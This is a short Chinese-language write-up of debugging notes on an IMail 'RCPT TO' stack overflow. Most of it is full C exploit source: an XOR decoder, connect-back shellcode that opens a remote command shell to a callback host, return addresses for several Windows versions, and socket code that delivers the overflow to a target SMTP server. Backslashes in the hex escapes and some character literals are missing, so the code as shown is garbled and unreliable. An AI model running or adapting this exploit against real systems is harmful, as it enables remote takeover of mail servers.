IMAIL RCPT溢出漏洞调试心得

文：郭海俊

最近对IMAIL RCPT存在的漏洞进行了相关调试，心得体会：

(1)、不要总盯着jmp/call esp，多看看eax、ebx、ecx、edx、、esj、ed、ebp等寄存器是否含有shellcode位置，还要注意ESP+??，即函数参数中是否含有shellcode位置。

(2)、关于shellcode的编码问题， shellcode不能含有如下7个字符：

<

>

@

:

空格

想法：测试输入字符过滤，可以用ASCII码表去覆盖缓冲区，然后用OllyDBG去看缓冲区的内容。

针对IMAIL  8.10，8.12，8.15做了测试，成功溢出，没有测试8.11和8.13，8.14的版本，有兴趣的可以测试下。

下面是相关的利用代码：

#include <winsock2.h>

#include <windows.h>

#pragma comment(lib, "ws2_32.lib")

unsigned char decode[] =

//22 decode[5] = xor_byte

"xebx0fx5Bx80x33xB8x43x81x3Bx44x6Fx41x78x75xF4xEBx05xE8xECxFFxFFxFF";

//22 decode[5] = xor_byte

//"xebx0fx58x80x30x9cx40x81x38x44x6Fx41x78x75xF4xEBx05xe8xecxffxffxff";

unsigned char end_mark[] = "x44x6Fx41x78";

///*

//connect back shellcode copied from metasploit shellcode framework

unsigned char sc[] =

"xe8x56x00x00x00x53x55x56x57x8bx6cx24x18x8bx45x3c"

"x8bx54x05x78x01xeax8bx4ax18x8bx5ax20x01xebxe3x32"

"x49x8bx34x8bx01xeex31xffxfcx31xc0xacx38xe0x74x07"

"xc1xcfx0dx01xc7xebxf2x3bx7cx24x14x75xe1x8bx5ax24"

"x01xebx66x8bx0cx4bx8bx5ax1cx01xebx8bx04x8bx01xe8"

"xebx02x31xc0x5fx5ex5dx5bxc2x08x00x5ex6ax30x59x64"

"x8bx19x8bx5bx0cx8bx5bx1cx8bx1bx8bx5bx08x53x68x8e"

"x4ex0execxffxd6x89xc7x81xecx00x01x00x00x57x56x53"

"x89xe5xe8x1fx00x00x00x90x01x00x00xb6x19x18xe7xa4"

"x19x70xe9xecxf9xaax60xd9x09xf5xadxcbxedxfcx3bx57"

"x53x32x5fx33x32x00x5bx8dx4bx18x51xffxd7x89xdfx89"

"xc3x8dx75x14x6ax05x59x51x53xffx34x8fxffx55x04x59"

"x89x04x8exe2xf2x2bx27x54xffx37xffx55x28x31xc0x50"

"x50x50x50x40x50x40x50xffx55x24x89xc7x68x7fx00x00" //14*16=224 //ip sc[221]~[224]

"x01x68x02x00x22x11x89xe1x6ax10x51x57xffx55x20x59" //15 //port sc[228] [229]

"x59x68x43x4dx44x00x89xe3x87xfax31xc0x8dx7cx24xac"

"x6ax15x59xf3xabx87xfax83xecx54xc6x44x24x10x44x66"

"xc7x44x24x3cx01x01x89x7cx24x48x89x7cx24x4cx89x7c"

"x24x50x8dx44x24x10x54x50x51x51x51x41x51x49x51x51"

"x53x51xffx75x00x68x72xfexb3x16xffx55x04xffxd0x89"

"xe6xffx75x00x68xadxd9x05xcexffx55x04x89xc3x6axff"

"xffx36xffxd3xffx75x00x68x7exd8xe2x73xffx55x04x31" //22*16 352

"xdbx53xffxd0"; // 352+4 = 356;

//*/

/*

unsigned char sc[] =

"xe8x56x00x00x00x53x55x56x57x8bx6cx24x18x8bx45x3c"

"x8bx54x05x78x01xeax8bx4ax18x8bx5ax20x01xebxe3x32"

"x49x8bx34x8bx01xeex31xffxfcx31xc0xacx38xe0x74x07"

"xc1xcfx0dx01xc7xebxf2x3bx7cx24x14x75xe1x8bx5ax24"

"x01xebx66x8bx0cx4bx8bx5ax1cx01xebx8bx04x8bx01xe8"

"xebx02x31xc0x5fx5ex5dx5bxc2x08x00x5ex6ax30x59x64"

"x8bx19x8bx5bx0cx8bx5bx1cx8bx1bx8bx5bx08x53x68x8e"

"x4ex0execxffxd6x89xc7x81xecx00x01x00x00x57x56x53"

"x89xe5xe8x1fx00x00x00x90x01x00x00xb6x19x18xe7xa4"

"x19x70xe9xecxf9xaax60xd9x09xf5xadxcbxedxfcx3bx57"

"x53x32x5fx33x32x00x5bx8dx4bx18x51xffxd7x89xdfx89"

"xc3x8dx75x14x6ax05x59x51x53xffx34x8fxffx55x04x59"

"x89x04x8exe2xf2x2bx27x54xffx37xffx55x28x31xc0x50"

"x50x50x50x40x50x40x50xffx55x24x89xc7x68x7fx00x00"

"x01x68x02x00x22x11x89xe1x6ax10x51x57xffx55x20x59"

"x59x68x43x4dx44x00x89xe3x87xfax31xc0x8dx7cx24xac"

"x6ax15x59xf3xabx87xfax83xecx54xc6x44x24x10x44x66"

"xc7x44x24x3cx01x01x89x7cx24x48x89x7cx24x4cx89x7c"

"x24x50x8dx44x24x10x54x50x51x51x51x41x51x49x51x51"

"x53x51xffx75x00x68x72xfexb3x16xffx55x04xffxd0x89"

"xe6xffx75x00x68xadxd9x05xcexffx55x04x89xc3x6axff"

"xffx36xffxd3xffx75x00x68xefxcexe0x60xffx55x04x31"

"xdbx53xffxd0";

*/

//pop,ret

unsigned char jmpaddr[][4] =

{ "xe1x1exfax7f",      // cn 2k/xp/2003

  "xafxd8x87x7c",    // en 2003 sp1 NTDLL.DLL

  "x4cxc1xd5x77",   // en 2003 sp0 USER32.DLL

  "x97x31x02x75"    // en 2k All SPs

};          

//

//函数声明

//

void imail_exp(int smtp_ip, int smtp_port, int cb_ip, int cb_port, int imail_ver, int os_ver);

//

//main()

//

void main(int argc, char* argv[])

{

       if(argc == 7)

       {

              imail_exp(inet_addr(argv[1]), atoi(argv[2]), inet_addr(argv[3]), atoi(argv[4]), atoi(argv[5]), atoi(argv[6]));

       }

       else

       {

              printf(

                     "IMail "RCPT TO" Remote Stack Overflow Exploit "

                     "Usage:"

                     "  %s <attack_ip> <smtp_port> <cb_ip> <cb_port> <imail_ver> <os_ver>"

                     "  imail_ver: 0 ==> 8.10, 8.12 tested"

                     "             1 ==> 8.15 tested(maybe 8.13)"

                     "  os_ver:    0 ==> cn 2k/xp/2003"

                     "             1 ==> en 2003 sp1 NTDLL.DLL"

                     "             2 ==> en 2003 sp0 USER32.DLL"

                     "             3 ==> en 2k All SPs"

                     ,argv[0]);

       }

}

void imail_exp(int smtp_ip, int smtp_port, int cb_ip, int cb_port, int imail_ver, int os_ver)

{

       char  buf[1024] = ;

       char  respond[512] = ;

       int   i;

       char* p;

       WSADATA     wsaData;

       SOCKET  sock;

       struct  sockaddr_in      smtp_addr;

       char ehlo[] = "EHLO ph4nt0m";

       char mailfrom[] = "MAIL FROM <root@ph4nt0m.org>";

       char quit[] = "QUIT";

       p = (char*)&cb_ip;

       sc[221] = p[0];

       sc[222] = p[1];

       sc[223] = p[2];

       sc[224] = p[3];

       p = (char*)&cb_port;

       sc[228] = p[1];

       sc[229] = p[0];

       //decode[5] = 0xB8;

       for(i=0; i<356; i++)

       {

              sc[i] = sc[i] ^ 0xB8;

              if(    sc[i]==0x00||

                     sc[i]==''||

                     sc[i]==''||

                     sc[i]=='V'||

                     sc[i]==' ' ||

                     sc[i]=='@' ||

                     sc[i]==':' ||

                     sc[i]=='<' ||

                     sc[i]=='>' ||

                     sc[i]=='"'  )

              {

                     printf("sc[%d]:%c bad char!", i, sc[i]);

                     return;

              }

       }

       memset(buf, 0x41, sizeof(buf));

       strcpy(buf, "RCPT TO <@:");

       memcpy(buf+11, decode, 22);

       memcpy(buf+11+22, sc, 356);

       memcpy(buf+11+22+356, end_mark, 4);

       p = jmpaddr[os_ver];

    switch(imail_ver)

       {

       case 0: //8.10 8.12

              //memcpy(buf+11+492, "x41x41x41x41", 4);

              memcpy(buf+11+492, p, 4);

              memcpy(buf+11+496, ">", 4);

              break;

       case 1: //8.15

              //memcpy(buf+11+544, "xddxddxfdx7f", 4);

              memcpy(buf+11+548, p, 4);

              memcpy(buf+11+552, ">", 4);

              break;

       default:

              printf("This Version is not supported.");

              return;

       }

       //printf("%s", buf);

       if(WSAStartup( MAKEWORD(2,2), &wsaData) != 0) //WSAStartup初始化

    {

              printf("[-]WSAStartup() error.");

              return;

    }

       if((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) 

    {

              printf("[-]socket() error.");

              return;

    }

       smtp_addr.sin_family = AF_INET;

       smtp_addr.sin_port = htons((short)smtp_port);

       smtp_addr.sin_addr.s_addr = smtp_ip;

       ZeroMemory(smtp_addr.sin_zero, 8);

       printf("[+]connecting to %s:%i...", inet_ntoa(smtp_addr.sin_addr), smtp_port);

       if(connect( sock, (struct sockaddr*)&smtp_addr, sizeof(struct sockaddr)) == SOCKET_ERROR)//连接服务器

       {

              printf("[-]connect() error.");

              closesocket(sock);

              return;

       }

       recv(sock, respond, sizeof(respond), 0);

       printf("[S]%s", respond);

       send(sock, ehlo, strlen(ehlo), 0);

       recv(sock, respond, sizeof(respond), 0);

       if(strstr(respond, "250"))

       {

              printf("[C]%s", ehlo);

       }

       else

       {

              printf("[-]fail ehlo.");

              closesocket(sock);

              return;

       }

       send(sock, mailfrom, strlen(mailfrom), 0);

       recv(sock, respond, sizeof(respond), 0);

       if(strstr(respond, "250"))

       {

              printf("[C]%s", mailfrom);

       }

       else

       {

              printf("[-]fail mailfrom.");

              closesocket(sock);

              return;

       }

       send(sock, buf, strlen(buf), 0);

       printf("[+]Sending exploit code..."

              "Good Luck!");

       //Sleep(3000);

       closesocket(sock);

       return;

}